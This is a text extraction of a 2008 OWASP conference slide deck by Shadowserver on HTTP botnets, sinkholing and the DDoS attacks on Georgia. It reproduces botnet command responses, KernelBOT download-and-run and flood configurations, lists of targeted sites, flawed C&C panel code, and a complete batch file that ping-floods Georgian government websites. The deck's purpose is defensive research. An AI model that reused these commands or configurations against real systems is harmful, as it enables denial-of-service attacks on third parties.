owasp asia 2008 steven

8/8/2019 OWASP Asia 2008 Steven

1/58

Copyright The OWASP FoundationPermission is granted to copy, distribute and/or modify this documentunder the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

HTTP Botnet Research AppSec Asia Taiw an

Steven AdairThe Shadow server [email protected]

October 28, 2008
http://en.wiktionary.org/wiki/%E5%8F%B0%E7%81%A3mailto:[email protected]:[email protected]://en.wiktionary.org/wiki/%E5%8F%B0%E7%81%A3


2/58

OWASP 2

Agenda

ShadowserverDefinitionsCommand and Control (C&C)HTTP Botnets: Case Studies & Monitoring

BlackEnergyKernelBOT*

Sinkhole ServerGeorgian DDoS Attacks (time permitting)


3/58

OWASP 3

Shadowserver

The Shadow server Foundation An all volunteer watchdog group of security

professionals that gather, track, and report onmalware, botnet activity, and electronic fraud.

I t is the mission of the Shadow serverFoundation

To improve the security of the Internet by raisingawareness of the presence of compromised systems,malicious attackers, and the spread of malware.


4/58

OWASP 4

Definitions

BotnetBotnet A distributed network of A distributed network of compromised computerscompromised computerscontrolled by acontrolled by a botbot herder viaherder viaa command & controla command & controlmechanism.mechanism.

C&CC&C Command & ControlCommand & Control A computer or a network of A computer or a network of computers, controlled by acomputers, controlled by a botbotherder, that sends commandsherder, that sends commandsto theto the botnetbotnet ..

Drone or Zombie (Drone or Zombie ( botbot )) A compromised computer that A compromised computer thatreceives commands via thereceives commands via theC&CC&C

BotBot HerderHerderIndividual who owns orIndividual who owns orcontrols thecontrols the botnetbotnet ..

IRCIRC A protocol designed for real A protocol designed for real

time chat communicationtime chat communicationbased on clientbased on client --serverserverarchitecturearchitecture


5/58

OWASP 5

Process Flow


6/58

OWASP


7/58

OWASP 7

Shadow server Generated Custom Reports

Report TypesDDoSC&C ListCompromised HostClick-Through FraudDrones

ProxiesURL ReportSpam

Filters ASNCIDR/IP RangesCountry Code (example: TW)

RecipientsPublic IRC Services

Emerging Threats Snort

DNS Registrars

Commercial Vendors

40+ CERT's

ASN Owners

2300+ CIDR Owners

7 International LEO's5 International Critical

Infrastructure Groups


8/58

OWASP 8

Shadow server Generated Custom Reports


9/58

OWASP 9

Shadow server Reports: Cost ($$)

How much does it cost to receive all of thereports from Shadowserver? (Win a Mercedes)

$100 NT$1000 NT$5000 NT

$10000 NTHint: Same price in USD as in NT

OK its a trick question, sorry. $0 NT = $0 USDThats right its free!Currently no one in Taiwan receives our reports!


10/58

OWASP 10

Command and Control

A look into how botnets arenow being controlled by theherders


11/58

OWASP 11

Botnets Not Just IRC Anymore?

IRC is no longer the #1 command and control(C&C) mechanism for bots

Still very popular though we promise!Hundreds of versionsRelatively easy to setup

Peer-to-Peer (P2P) botnets have also somewhatmade their way to the forefront in recent years

Storm Worm anyone?Not so easy and quick to setupFar from the #1 C&C mechanism


12/58

OWASP 12

Botnets M ost Popular C&C M echanism

Who has what it takes to be #1?Not IRC

Not P2PHTTP controlled botnets are now on top andshow no signs of turning back

Dozens of new HTTP based botnets every week Generally a centralized server (not always)

Thousands of Malicious DomainsDynamic DNS (3322.org, vicp.net, etc)Direct IP access as well


13/58

OWASP 13

HTTP Botnets Benefits?

What are the benefits to HTTP based botnets (tothe bad guys)?

Low barrier to entry kits easy to find Very easy to setup

LAMP stack

tar xf botnet.tgzInfected systems phone in right over port 80

Looks like normal web traffic

Allowed out of most networksHarder for intrusion detection systems to detect

No signatures or black lists = no detection


14/58

OWASP 14

HTTP Botnets Types & Uses

What are the different types of HTTP botnets?Banker/InfoStealer/Keylogger

Distributed Denial of Service (DDoS)SpamOther/SpecializedHybrid (mix and match the above)

The uses.. Pretty straightforward

Make money $$$Show Off/Revenge (DDoS)


15/58

OWASP 15

HTTP Botnets:Case Studies & Monitoring

Case 1: BlackEnergy Russian HTTP DDoS BotCase 2: KernelBOT Chinese HTTP DDoS Bot


16/58


17/58

OWASP 17

BlackEnergy Client POST

POST //stat.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

Windows NT 5.1; SV1;.NET CLR 1.1.4322)Host: Content-Length: 35Cache-Control: no-cache

id=xmyPC33_213BEDBA&build_id=4C526F62


18/58

OWASP 18

BlackEnergy Client POST

HTTP/1.1 200 OKDate: Sat, 10 May 2008 16:26:54 GMTServer: Apache/2.2.8 (EL)

X-Powered-By: PHP/5.2.5Content-Length: 184Connection: close

Content-Type: text/html MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI2Zb29kIGh0dHAgd3d3LnJ1c3NpYW5jYXNpbm8ucnUsZG9zdWd2aXA ucnUsd3d3LnctNzc3LmNvbSxpbnRyYWRheWludmVzdG1lbnRnc

m91cC5jb20gYWNjb3VudC5waHAjNSM Decodes to10;2000;10;0;0;30;100;3;20;1000;2000#flood http

www.russiancasino.ru,dosugvip.ru,www.w-

777.com,intradayinvestmentgroup.com account.php#5#


19/58


20/58

OWASP 20

BlackEnergy Gambling Attack

Tough to shut down sometimesQuestionable registrar

Responsive ISP = new ISPSix different ISPs in 4 months

Beware of UpdatesBotnet can update itself!Bots updated with new software to phone into additionalBlackEnergy C&C (new domain)

It Gets WorseBots updated with different malwareZeus/ntos/Zbot/PRG/wsnpoem InfoStealer


21/58

OWASP 21

BlackEnergy Gambling Attack


22/58

OWASP 22

BlackEnergy Bad Coding

if ($login){

Sleep(1);if ($luser == $user && $lpass == $pass){

setcookie(", $pass);header("location: index.php");

}} else {

if ( === $pass){

= true;}

}


23/58

OWASP 23

BlackEnergy Login Screen


24/58

OWASP 24

BlackEnergy Add N Edit Cookies


25/58

OWASP 25

BlackEnergy Bad Coding Results


26/58

OWASP 26

BlackEnergy M ore Fun Code

$id = addslashes($_POST['id']);$build_id = addslashes($_POST['build_id']);

$sql = "REPLACE INTO `stat`

(`id`, `build_id`, `files`, `ip`, `last`, `country`,`country_full`)

VALUES('$id ', '$build_id ', '".serialize($files)."', '$addr',

'".time()."', '{$country['country']}','{$country['country_full']}')";

db_query($sql);


27/58

OWASP 27

KernelBOT

In May 2008 Shadowserver came across a new web-based (HTTP) DDoS Bot that we have named

KernelBOT Like BlackEnergy it can target several IPs/hosts at a timeSo far we have only seen it active in .cn webspace

Also appears that all instances may be run by one person

Multiple Attack CapabilitiesHTTP flooder (DDOS_ScriptFlood)UDP flooder (DDOS_UdpFlood)TCP SYN flooder (DDOS_SynFlood)TCP flooder (DDOS_TcpFlood)

Download/Update Capabilities along with OtherFunctionality


28/58

OWASP 28

KernelBOT Config/ Command File

Infected KernelBOT systems frequently beaconand request a file from the C&C web server for

their commandsThis file has typically been named cmd.txt

This file control the bot and gives severalinstructions to infected systems

URL to phone into for statsURLs to download (additional malware/updates)Targets for DDoS*


29/58

OWASP 29

KernelBOT Config: Version Track ing

Very top of cmd.txt configuration file setsversion to prevent other settings frombeing executed over and over([KernelSetting]):

[UpdateServer]NewVersion=20080711UpdateFileUrl=


30/58

OWASP 30

KernelBOT Config: Stats and Dow nloads

Next section in config, [KernelSetting], tellsthe bot where to report to and what additionalfiles to download/execute:

[KernelSetting]IsReportState=1ReportStateUrl=http://.com/kernel/zz.htm

IsDownFileRun0=0DownFileRunName0=iexp1ore.exeDownFileRunUrl0=http:/ /.com/download/webcc.exe

SuperDownFileRunUrl9=http://.vicp.net/download/Loader.exe


31/58

OWASP 31

KernelBOT Config: DDoS

Finally the remaining sections are related to DDoSattacks and are always checked for updates (notaffected by Version Tracking):

[DDOS_ScriptFlood_A1]IsScriptFlood=0CmdID=60ScriptFloodUrl=/Discuz!/viewthread.php?tid=220479&extra=page%3D1ScriptFloodDNS=bbs.vsa.com.cnScriptFloodPort=80IsGetUrlFile=0

ThreadLoopTime=2000ThreadCount=1IsTimer=1Timer=6000


32/58

OWASP 32

KernelBOT: Recent Attacks

DDoS of Different Websites

flood http www.hackthissite.org/subs/news/view_news.phpflood http www.hackinthebox.org/print.php?sid=28714

flood http://www.hacker.com.cn/news/view.asp?id=1883flood http http://www.president.gov.ge/index.phpflood http http://www.skeagle.com/flood http http://www.threatexpert.com/threats.aspx

flood http http://bbs.pcshares.cn/Board.aspx?BoardID=5&GroupID=0flood udp 218.26.179.194flood tcp edition.cnn.com:80 (4-19-2008)*

Not Really Attacks:

flood http http://www.google.com/search?q=www.nnit30.comflood http http://www.google.cn/search?q=www.nnit30.comflood http http://www.baidu.com/s?wd=www.job114.net.cn


33/58

OWASP 33

HTTP Botnets M onitoring

First step is to know what to monitorMalware sandboxing

Extract URLS and relevant informationData sharing/partners

Then we must be able to emulate the botPerl script with configuration file

Periodically polls C&C server for commands

Similar to our IRC perl scriptsEmulate infected HTTP drone instead of IRC drone

Finally record and reportLogged to database and sent out in daily reports


34/58

OWASP 34

Sinkhole Server

Taking over the command and controlto find orphaned bots and hacked (SQL injected)

web sites


35/58

OWASP 35

M alicious Domains

Many malicious domains expire or are otherwisereleased from use after a bot herder/hacker

loses access.Most often due to expiration of domain orsubdomain to due suspension AUP violation,fraudulent payment/registration information, orloss of control of backend server.

In most cases the domains would still be in useif the bot herder/hacker could still access them.


36/58

OWASP 36

M alicious Domains Continued

These domains have expired, so what can wedo?

Registrars/Dynamic DNS providers have deletedthese domains and subdomains w e can nowregister them !These domains are available for anyone toregister or sign up for since they are no longer

in use.


37/58

Si kh l S


38/58

OWASP 38

Sinkhole Server

An in-house custom developed C++ application for linux.Binds to all ports on the specified interfaces and listensfor incoming connectionsEmulates both HTTP and IRC protocolsLogs the data received related to HTTP and IRC requests

Also runs p0f in an attempt to identify connecting OS (useful fordetecting anomalous/research traffic)

KrCERT has been doing something similar, see:http://www.cert.org/archive/pdf/BotSinkhole_KrCERTCC.pdf

Si kh l S L i
http://www.cert.org/archive/pdf/BotSinkhole_KrCERTCC.pdfhttp://www.cert.org/archive/pdf/BotSinkhole_KrCERTCC.pdf


39/58

OWASP 39

Sinkhole Server Logging

Some of the information we are logging fromthe requests:

Connecting IP addressSource PortDestination Port

Hostname ASN and GeoLocationTimestampp0f information (several)HTTP information (uri,host,User-Agent,referer)Tor connections (yes/no)

Si kh l S E l i d P tt P i t


40/58

OWASP 40

Sinkhole Server Explained: Pretty P icture

Sink hole Server: HTTP Accesses


41/58

OWASP 41

Sink hole Server: HTTP Accesses

+-------------------+--------------+-----------------------+------------------------+---------------+--------------+| Total HTTP Hits | Unique IP's | Unique HTTP Agents's

| Unique HTTP Referer's

| Unique ASN's

| Unique GEO's

|+-------------------+--------------+----------------------+------------------------+---------------+--------------+| 29,020,033 | 256,424 | 4,824 | 1,067 | 3,550 | 159 |+-------------------+--------------+-----------------------+------------------------+---------------+--------------+

Some domains are far more active than othersResults after ~1 month of activity

+------+----------------+--------------+----------------+| Week | Access Count | Unique IP's | Daily Average |+------+----------------+--------------+----------------+| 35 | 2,672 | 482 | 68.8571 || 36 | 897,271 | 14,299 | 2,042.7143 || 37 | 3,415,102 | 19,641 | 2,805.8571 || 38 | 2,543,328 | 11,489 | 1,641.2857 || 39 | 6,075,688 | 65,092 | 9,298.8571 || 40 | 7,570,702 | 87,441 | 12,491.5714 || 41 | 7,708,745 | 85,694 | 12,242.0000 || 42 | 806,525 | 12,801 | 1,828.7143 |+------+----------------+--------------+----------------+


42/58

OWASP 42

Georgian DDoS Attacks

The country of Georgiacomes under attack.

HTTP Botnet Targets Georgian P resident


43/58

OWASP 43

HTTP Botnet Targets Georgian P resident

Shadowserver observes first DDoS attack on July 19,2008Multipronged attack against the website of MikheilSaakashvili (www.president.gov.ge)

ICMP floodTCP SYN floodHTTP flood

Website was completely down or extremely slow forseveral days

Attacks were issued by Machbot controller that hadover 15,000 bots

HTTP Botnets M achbot Controller


44/58

OWASP 44

HTTP Botnets - M achbot Controller

Botnet controlled by central web server usingthe domain bizus-kokovs.cc to issuecommands to do the following:

flood http www.president.gov.ge/win+love+in+Rusiaflood tcp www.president.gov.geflood icmp www.president.gov.ge

Bots phone into web-based C&C to getcommand via HTTP

Machbot C&C located in the United StatesServer was quickly taken down to never returnagain

Russian-Georgian Conflict


45/58

OWASP 45

Russian-Georgian Conflict

August 8, 2008 the Russian-Georgian conflictescalates to actual fighting

On the same day a cyber attacks againstGeorgia commence once againWebsites are attacked by botnets and citizensalikeForums filled with posts from hacktivists both

taking and urging action


46/58

ge W ebsites Heavily Targeted Contd


47/58

OWASP 47

.ge W ebsites Heavily Targeted Cont d

Starting on August 8, Georgian websites becomeheavily targeted for SQL injection and other

vulnerabilitiesSeveral websites including those for thePresident and the Parliament of Georgia arehacked and defacedEach day new vulnerabilities are publicly postedabout Georgian websites (.ge to include .gov.ge)

HTTP Botnets Called to Action


48/58

OWASP 48

HTTP Botnets Called to Act ion

8-8-2008: Botnets start DDoSing Georgiangovernment and news websites & others thatare sympathetic to the causeSeveral BlackEnergy DDoS botnets observedtaking part in attacks:

194.67.33.81googlecomaolcomyahoocomaboutcom.netturkeyonline.name

supportonline.mcdir.ruincasher.netad.yandexshit.com

Botnet Targeted Sites


49/58

OWASP 49

Botnet Targeted Sites

www.president.gov.gewww.president.gov.ge

www.parliament.gewww.parliament.genews.genews.geapsny.geapsny.ge

newsgeorgia.runewsgeorgia.rutbilisiweb.infotbilisiweb.info

hacking.gehacking.ge

osos

--inform.cominform.com

mk.rumk.ruwww.skandaly.ruwww.skandaly.ru

www.kasparov.ruwww.kasparov.ru

Lots of speculation that only botnetswere being used and that theRussian government was behind it

Flow Data Tells Another Story


50/58

OWASP 50

Flow Data Tells Another Story

Most observed .ge targeted botnet attacks dropoff ~August 12, although a few continue or

periodically attack DDoS attacks did not stop8-13-08: Shadowserver has access to flow datafor one of the .gov.ge websites and can seeattacks are still on going

Traffic is still very heavy, however, most of it isnot TCP traffic

Not the Russian Government?


51/58

OWASP 51

Incoming traffic is almost all ICMP (pinganyone?)

Almost all incoming traffic is from Russian dial-up addresses and residential broadband linesThis is starting to sound very familiar

Remember Estonia?


52/58

OWASP 52

Yes of course we do and we remember that theaverage citizen got involved... Could this be

happening here?Everyone wants to believe the Russiangovernment is behind everything...Wait.. Maybe all the government officials rushedhome to use their PCs to attack!

Lets see what this could be... Google search:ping + .gov.ge

Grass Roots Efforts


53/58

OWASP 53

Several Russian forums,Several Russian forums, blogsblogs , and websites have been, and websites have beendistributing and encouraging the use of the followingdistributing and encouraging the use of the followingWindows batch file:Windows batch file:

@echo off@echo Call this file (MSK) 18:00, 20:00@echo Thanks for support of South Ossetia! Please, transfer this file to the friends!pausestart ping n 5000 l 1000 www.newsgeorgia.ru tstart ping n 5000 l 1000 www.apsny.ge tstart ping n 5000 l 1000 www.nukri.org tstart ping n 5000 l 1000 www.opentext.org.ge tstart ping n 5000 l 1000 www.messenger.com.ge tstart ping n 5000 l 1000 www.president.gov.ge tstart ping n 5000 l 1000 www.government.gov.ge tstart ping n 5000 l 1000 www.parliament.ge tstart ping n 5000 l 1000 nsc.gov.ge tstart ping n 5000 l 1000 www.constcourt.gov.ge tstart ping n 5000 l 1000 www.supremecourt.ge tstart ping n 5000 l 1000 www.cec.gov.ge tstart ping n 5000 l 1000 www.nbg.gov.ge t

start ping n 5000 l 1000 www.nplg.gov.ge tstart ping n 5000 l 1000 www.police.ge tstart ping n 5000 l 1000 www.mod.gov.ge tstart ping n 5000 l 1000 www.mes.gov.ge tstart ping n 5000 l 1000 www.mfa.gov.ge tstart ping n 5000 l 1000 www.iberiapac.ge tstart ping n 5000 l 1000 www.mof.ge t

Grass Roots Efforts Contd


54/58

OWASP 54

On August 13, 2008 we were able to find thisscript on dozens of websites with the earliest

date of posting being on the August 8, 2008Grass roots hacktivist attacks, like the ones seenagainst Estonia, began on the *same* day asthe botnet attacks and continued well beyondthemDoesnt look quite so government controlled ororchestrated any longer


55/58

Conspiracy Theories Dispelled


56/58

OWASP 56

Despite many claims that the botnets weregovernment controlled and only aiming at

Georgian websites, the facts and history tellanother storyMost BlackEnergy botnets that Shadowserverobserved that were involved in DDoS attacksagainst Georgian websites attacked completelydifferent and unrelated websites priorDDoS history seems to support the idea botherders are also hacktivists

Conspiracy Theories Dispelled


57/58

OWASP 57

Here is a sampling of previous DDoS targets from thebotnets involved in the Georgia attacks:

www.in-bank.netcarder.bizdivaescort.compayclubs.biz

night-fairy.comvodkaescort.netcc-hack.eu

igame.rui-german.net

Thank You!


58/58

OWASP 58

Feel free to ask me any questionsafter the presentation or send me

an e-mail at:

[email protected]

Our website:

http://www.shadowserver.org
mailto:[email protected]://www.shadowserver.org/http://www.shadowserver.org/mailto:[email protected]

owasp asia 2008 steven

Documents